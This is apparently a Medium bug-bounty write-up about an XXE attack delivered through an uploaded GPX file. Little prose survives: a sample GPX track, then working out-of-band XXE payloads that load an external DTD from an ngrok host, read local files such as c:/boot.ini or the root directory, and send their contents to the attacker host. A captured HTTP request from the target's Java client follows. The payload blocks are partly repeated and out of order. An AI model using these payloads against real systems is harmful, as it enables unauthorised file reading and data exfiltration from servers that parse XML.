My first XML External Entity (XXE) attack with .gpx file

<gpx xmlns=”http://www.topografix.com/GPX/1/1" xmlns:gpxx=”http://www.garmin.com/xmlschemas/GpxExtensions/v3" xmlns:gpxtpx=”http://www.garmin.com/xmlschemas/TrackPointExtension/v1" creator=”Oregon 400t” version=”1.1" xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=”http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 ">
<metadata>
<link href=”http://www.garmin.com">
<text>Garmin International</text>
</link>
<time>2009–10–17T22:58:43Z</time>
</metadata>
<trk>
<name>Example GPX Document</name>
<trkseg>
<trkpt lat=”47.644548" lon=”-122.326897">
<ele>4.46</ele>
<time>2009–10–17T18:37:26Z</time>
</trkpt>
</trkseg>
</trk>
</gpx>
<?xml version=”1.0" encoding=”UTF-8"?> <!DOCTYPE foo SYSTEM “https://37*****f.ngrok.io/Desktop/xxe_file.dtd">
<foo>&attack;</foo>
<!ENTITY % d SYSTEM “file:///c:/boot.ini”>
<!ENTITY % c “<!ENTITY rrr SYSTEM ‘https://37*****f.ngrok.io/%d;'>">
<?xml version=”1.0" encoding=”UTF-8"?>
<!DOCTYPE foo SYSTEM “https://37*****f.ngrok.io/Desktop/xxe_file.dtd">
<foo>&attack;</foo>
<!ENTITY % vuln1 SYSTEM “file:///”>
<!ENTITY % vuln2 “<!ENTITY attack SYSTEM ‘http://37*****f.ngrok.io/EXAMPLE?%vuln1;'>">
%vuln2;
GET /Desktop/xxe_file.dtd HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.7.0_15
Host: 37***cf.ngrok.io
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
X-Forwarded-For: 54.246.***.***

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

DEFEND THE WEB INTRO 1–7 CHALLENGES

How to use Torrents on your PC?

AuroraFS Mining Model

Internet Traffic Generator

In A World Of Privacy: The Time Has Come For Paillier Encryption To Step Forward

{UPDATE} remember? Hack Free Resources Generator

What to know to enjoy porn videos securely

My OSINT challenges writeups for Vulncon CTF 2020.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Valeriy Shevchenko

Valeriy Shevchenko

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

More from Medium

picoCTF — logon

Codebreaker Challenge CTF Write Up 2022 (CBC-CTF)

Detail Description about SPF Records

TryHackMe — OWASP Top 10 — Security Misconfiguration